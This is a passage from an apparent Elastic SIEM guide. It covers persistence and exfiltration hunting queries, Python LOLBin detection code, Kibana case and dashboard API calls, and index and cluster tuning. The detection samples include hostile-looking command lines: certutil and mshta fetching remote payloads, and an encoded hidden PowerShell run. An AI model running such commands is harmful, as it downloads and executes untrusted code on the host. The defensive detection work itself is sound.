                  { "wildcard": { "registry.path": { "value": "*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*", "case_insensitive": true } } },
                  { "wildcard": { "registry.path": { "value": "*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\*", "case_insensitive": true } } }
                ],
                "minimum_should_match": 1
              }
            }
          }
        },
        {
          "bool": {
            "must": [
              { "term": { "event.category": "file" } },
              { "wildcard": { "file.path": { "value": "*\\\\Start Menu\\\\Programs\\\\Startup\\\\*", "case_insensitive": true } } }
            ]
          }
        }
      ],
      "minimum_should_match": 1
    }
  }
}

# Hunt for data exfiltration: sources that moved 100 MB or more outbound in the
# last 24 hours. Packetbeat only fills network.direction when
# packetbeat.interfaces.internal_networks is configured.
GET /packetbeat-*/_search
{
  "query": {
    "bool": {
      "must": [
        { "range": { "@timestamp": { "gte": "now-24h" } } },
        { "term": { "network.direction": "outbound" } }
      ]
    }
  },
  "aggs": {
    "large_transfers": {
      "filter": { "range": { "network.bytes": { "gte": 100000000 } } },
      "aggs": {
        "by_source": {
          "terms": { "field": "source.ip", "size": 10 },
          "aggs": {
            "total_bytes": { "sum": { "field": "network.bytes" } },
            "destinations": { "terms": { "field": "destination.ip", "size": 5 } }
          }
        }
      }
    }
  }
}
```
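The matching logic behind the living-off-the-land and persistence hunts above, as an added Python example (not code from the page or from Elastic) run over constructed Winlogbeat-style events. It makes explicit what the query DSL hides: `registry.path` and `file.path` carry full paths, so the autostart-key fragments must be matched as case-insensitive substrings (the `wildcard` queries above), and scheduled tasks under `\Microsoft\` are excluded, not required. Event shapes, hostnames and paths are made up for this example.

```python
"""Added example: LOLBin and persistence hunt logic over constructed events."""
from collections import defaultdict
from typing import Any, Dict, List, Tuple

LOLBINS = {"certutil.exe", "bitsadmin.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "wmic.exe"}
DOWNLOAD_MARKERS = ("http", "download", "urlcache")
# Autostart keys, lower-cased; matched as substrings of the full registry.path
RUN_KEYS = (
    "\\software\\microsoft\\windows\\currentversion\\run",
    "\\software\\microsoft\\windows\\currentversion\\runonce",
    "\\software\\microsoft\\windows nt\\currentversion\\winlogon",
)
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def get_nested(doc: dict, path: str, default: Any = None) -> Any:
    """Read doc[a][b] for the dotted ECS field name 'a.b'."""
    cur: Any = doc
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return default
        cur = cur[part]
    return cur


def hunt_lolbins(events: List[dict]) -> Dict[str, Dict[str, int]]:
    """{host.name: {process.name: count}} for LOLBins run with download-like
    arguments, i.e. the by_host/by_process aggregation of the first query."""
    hits: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for event in events:
        if get_nested(event, "event.category") != "process":
            continue
        name = (get_nested(event, "process.name") or "").lower()
        cmd = (get_nested(event, "process.command_line") or "").lower()
        if name in LOLBINS and any(marker in cmd for marker in DOWNLOAD_MARKERS):
            hits[get_nested(event, "host.name")][name] += 1
    return {host: dict(procs) for host, procs in hits.items()}


def hunt_persistence(events: List[dict]) -> List[Tuple[str, str, str]]:
    """(host.name, signal, value) for each of the three persistence signals."""
    findings: List[Tuple[str, str, str]] = []
    for event in events:
        host = get_nested(event, "host.name")
        # 4698: scheduled task created; skip Windows' own \Microsoft\ tree
        if str(get_nested(event, "winlog.event_id")) == "4698":
            task = get_nested(event, "winlog.event_data.TaskName", "")
            if not task.lower().startswith("\\microsoft\\"):
                findings.append((host, "scheduled_task", task))
            continue
        category = get_nested(event, "event.category")
        if category == "registry":
            # full key path, e.g. HKLM\SOFTWARE\...\CurrentVersion\Run\Updater,
            # so an exact match on the "\Software\...\Run" fragment can never hit
            path = get_nested(event, "registry.path", "")
            if any(key in path.lower() for key in RUN_KEYS):
                findings.append((host, "run_key", path))
        elif category == "file":
            path = get_nested(event, "file.path", "")
            if STARTUP_DIR in path.lower():
                findings.append((host, "startup_folder", path))
    return findings


# Constructed sample events (Winlogbeat/ECS shape, not real data)
SAMPLE_EVENTS = [
    {"host": {"name": "ws-01"}, "event": {"category": "process"},
     "process": {"name": "certutil.exe",
                 "command_line": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\\Users\\Public\\a.exe"}},
    {"host": {"name": "ws-01"}, "event": {"category": "process"},
     "process": {"name": "certutil.exe", "command_line": "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256"}},
    {"host": {"name": "ws-02"}, "event": {"category": "process"},
     "process": {"name": "mshta.exe", "command_line": "mshta.exe http://203.0.113.5/x.hta"}},
    {"host": {"name": "ws-02"}, "event": {"category": "process"},
     "process": {"name": "powershell.exe", "command_line": "powershell.exe -nop -w hidden -enc AAAA"}},
    {"host": {"name": "ws-01"}, "winlog": {"event_id": "4698",
     "event_data": {"TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag"}}},
    {"host": {"name": "ws-01"}, "winlog": {"event_id": "4698", "event_data": {"TaskName": "\\Updater"}}},
    {"host": {"name": "ws-02"}, "event": {"category": "registry"},
     "registry": {"path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"}},
    {"host": {"name": "ws-02"}, "event": {"category": "registry"},
     "registry": {"path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Foo"}},
    {"host": {"name": "ws-03"}, "event": {"category": "file"},
     "file": {"path": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\u.lnk"}},
]

if __name__ == "__main__":
    print(hunt_lolbins(SAMPLE_EVENTS))
    for finding in hunt_persistence(SAMPLE_EVENTS):
        print(finding)
```

The second `certutil.exe` event (a hash check) and the `powershell.exe` event are deliberately left unmatched: the first has no download marker, the second is not in the LOLBin list the hunt targets. The `Uninstall` registry write and the `ScheduledDefrag` task are the benign look-alikes that the substring match and the `\Microsoft\` exclusion respectively keep out.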

Case Management

```bash
# Create security case. "owner" is required; assignees are user-profile UIDs,
# not usernames.
curl -X POST "localhost:5601/api/cases" \
  -H "Content-Type: application/json" \
  -H "kbn-xsrf: true" \
  -u elastic:password \
  -d '{
    "title": "Suspicious PowerShell Activity Investigation",
    "description": "Investigation of suspicious PowerShell commands detected on multiple hosts",
    "tags": ["powershell", "malware", "investigation"],
    "severity": "high",
    "owner": "securitySolution",
    "assignees": [ { "uid": "analyst1" } ],
    "connector": { "id": "none", "name": "none", "type": ".none", "fields": null },
    "settings": { "syncAlerts": true }
  }'

# Add comment to case (<case_id> is the "id" field of the create response)
curl -X POST "localhost:5601/api/cases/<case_id>/comments" \
  -H "Content-Type: application/json" \
  -H "kbn-xsrf: true" \
  -u elastic:password \
  -d '{
    "comment": "Initial analysis shows PowerShell commands attempting to download and execute malicious payloads. Affected hosts: HOST-001, HOST-002, HOST-003",
    "type": "user",
    "owner": "securitySolution"
  }'

# Attach alert to case. Alert attachments need the rule that produced the
# alert and the alert index, which for detection alerts is the
# .alerts-security.alerts-<space> index rather than the source data index.
curl -X POST "localhost:5601/api/cases/<case_id>/comments" \
  -H "Content-Type: application/json" \
  -H "kbn-xsrf: true" \
  -u elastic:password \
  -d '{
    "type": "alert",
    "alertId": "alert-id-123",
    "index": ".alerts-security.alerts-default",
    "rule": { "id": "credential-dumping-001", "name": "Credential Dumping Activity" },
    "owner": "securitySolution"
  }'
```

Dashboards and Visualization

Security Overview Dashboard

Dashboard saved object in the shape `POST /api/saved_objects/dashboard` accepts; the referenced visualization id must already exist:

```json
{
  "attributes": {
    "title": "Security Operations Center Overview",
    "description": "High-level security metrics and alerts",
    "panelsJSON": "[{\"version\":\"8.11.0\",\"gridData\":{\"x\":0,\"y\":0,\"w\":24,\"h\":15,\"i\":\"1\"},\"panelIndex\":\"1\",\"embeddableConfig\":{},\"panelRefName\":\"panel_1\"}]",
    "optionsJSON": "{\"useMargins\":true,\"syncColors\":false,\"hidePanelTitles\":false}",
    "version": 1,
    "timeRestore": true,
    "timeTo": "now",
    "timeFrom": "now-24h",
    "refreshInterval": { "pause": false, "value": 300000 },
    "kibanaSavedObjectMeta": {
      "searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"
    }
  },
  "references": [
    { "name": "panel_1", "type": "visualization", "id": "security-alerts-timeline" }
  ]
}
```

Threat Hunting Dashboard

```bash
# Create threat hunting visualizations (legacy visState format; current Kibana
# expects the data view as a reference rather than a literal index pattern)
curl -X POST "localhost:5601/api/saved_objects/visualization" \
  -H "Content-Type: application/json" \
  -H "kbn-xsrf: true" \
  -u elastic:password \
  -d '{
    "attributes": {
      "title": "Process Execution Timeline",
      "visState": "{\"title\":\"Process Execution Timeline\",\"type\":\"histogram\",\"params\":{\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"showCircles\":true}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"interval\":\"auto\",\"customInterval\":\"2h\",\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"process.name\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\"}}]}",
      "uiStateJSON": "{}",
      "description": "",
      "version": 1,
      "kibanaSavedObjectMeta": {
        "searchSourceJSON": "{\"index\":\"winlogbeat-*\",\"query\":{\"match\":{\"event.category\":\"process\"}},\"filter\":[]}"
      }
    }
  }'

# Network traffic analysis visualization
curl -X POST "localhost:5601/api/saved_objects/visualization" \
  -H "Content-Type: application/json" \
  -H "kbn-xsrf: true" \
  -u elastic:password \
  -d '{
    "attributes": {
      "title": "Network Traffic by Destination Port",
      "visState": "{\"title\":\"Network Traffic by Destination Port\",\"type\":\"pie\",\"params\":{\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"sum\",\"schema\":\"metric\",\"params\":{\"field\":\"network.bytes\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"destination.port\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\"}}]}",
      "uiStateJSON": "{}",
      "description": "",
      "version": 1,
      "kibanaSavedObjectMeta": {
        "searchSourceJSON": "{\"index\":\"packetbeat-*\",\"query\":{\"match_all\":{}},\"filter\":[]}"
      }
    }
  }'
```

Performance Tuning

Index Management

```bash
ES_CA=/path/to/elasticsearch/config/certs/http_ca.crt

# Create index lifecycle policy.
# The rollover action only works when writes go through the alias named in
# index.lifecycle.rollover_alias (bootstrap siem-logs-000001 with
# is_write_index: true and point the Logstash output at index => "siem-logs").
# With the date-suffixed index names the Logstash pipeline above uses, ILM
# fails the rollover step, so either write through the alias or drop rollover.
curl --cacert "$ES_CA" -X PUT "https://localhost:9200/_ilm/policy/siem-policy" \
  -H "Content-Type: application/json" \
  -u elastic:password \
  -d '{
    "policy": {
      "phases": {
        "hot": {
          "actions": {
            "rollover": { "max_size": "10gb", "max_age": "1d" },
            "set_priority": { "priority": 100 }
          }
        },
        "warm": {
          "min_age": "7d",
          "actions": {
            "set_priority": { "priority": 50 },
            "allocate": { "number_of_replicas": 0 },
            "forcemerge": { "max_num_segments": 1 }
          }
        },
        "cold": {
          "min_age": "30d",
          "actions": {
            "set_priority": { "priority": 0 },
            "allocate": { "number_of_replicas": 0 }
          }
        },
        "delete": {
          "min_age": "90d",
          "actions": { "delete": {} }
        }
      }
    }
  }'

# Optimize search performance (a longer refresh interval trades search
# freshness for indexing throughput; 30s is a common SIEM compromise)
curl --cacert "$ES_CA" -X PUT "https://localhost:9200/siem-logs-*/_settings" \
  -H "Content-Type: application/json" \
  -u elastic:password \
  -d '{
    "index": {
      "refresh_interval": "30s",
      "number_of_replicas": 1,
      "codec": "best_compression"
    }
  }'

# Create a search template for common queries. Stored scripts live under
# _scripts, and a mustache conditional section ({{#host}} ... {{/host}}) is
# not valid JSON, so the source has to be passed as a string.
curl --cacert "$ES_CA" -X PUT "https://localhost:9200/_scripts/security-event-search" \
  -H "Content-Type: application/json" \
  -u elastic:password \
  -d '{
    "script": {
      "lang": "mustache",
      "source": "{\"query\":{\"bool\":{\"must\":[{\"range\":{\"@timestamp\":{\"gte\":\"{{from}}\",\"lte\":\"{{to}}\"}}},{\"term\":{\"event.category\":\"{{category}}\"}}],\"filter\":[{{#host}}{\"term\":{\"host.name\":\"{{host}}\"}}{{/host}}]}},\"sort\":[{\"@timestamp\":{\"order\":\"desc\"}}]}"
    }
  }'
```

Monitoring and Alerting

```bash
ES_CA=/path/to/elasticsearch/config/certs/http_ca.crt

# Monitor cluster health
curl --cacert "$ES_CA" -X GET "https://localhost:9200/_cluster/health?pretty" -u elastic:password

# Monitor index statistics (largest SIEM indices first)
curl --cacert "$ES_CA" -X GET "https://localhost:9200/_cat/indices/siem-*?v&s=store.size:desc" -u elastic:password

# Set disk watermarks: above "low" no new shards are allocated to the node,
# above "high" shards are moved away, at "flood_stage" indices become read-only
curl --cacert "$ES_CA" -X PUT "https://localhost:9200/_cluster/settings" \
  -H "Content-Type: application/json" \
  -u elastic:password \
  -d '{
    "persistent": {
      "cluster.routing.allocation.disk.watermark.low": "85%",
      "cluster.routing.allocation.disk.watermark.high": "90%",
      "cluster.routing.allocation.disk.watermark.flood_stage": "95%"
    }
  }'

# Create watcher for disk space monitoring.
# The watch API lives under _watcher. The http input talks to the node over
# TLS, so xpack.http.ssl.certificate_authorities must trust the node CA, and
# the email action needs an account under xpack.notification.email.account.
# Use a dedicated user with only the `monitor` cluster privilege here rather
# than embedding the elastic password in the watch.
# The ratio must be computed in floating point: available_in_bytes and
# total_in_bytes are longs, and integer division makes the condition always
# true.
curl --cacert "$ES_CA" -X PUT "https://localhost:9200/_watcher/watch/disk_space_monitor" \
  -H "Content-Type: application/json" \
  -u elastic:password \
  -d '{
    "trigger": { "schedule": { "interval": "5m" } },
    "input": {
      "http": {
        "request": {
          "scheme": "https",
          "host": "localhost",
          "port": 9200,
          "path": "/_nodes/stats/fs",
          "auth": { "basic": { "username": "watcher_monitor", "password": "monitor_password" } }
        }
      }
    },
    "condition": {
      "script": {
        "source": "ctx.payload.nodes.values().stream().anyMatch(node -> (double) node.fs.total.available_in_bytes / node.fs.total.total_in_bytes < 0.1)"
      }
    },
    "actions": {
      "send_email": {
        "email": {
          "to": ["admin@company.com"],
          "subject": "Elasticsearch Disk Space Alert",
          "body": "Disk space is running low on Elasticsearch cluster"
        }
      }
    }
  }'
```

Resources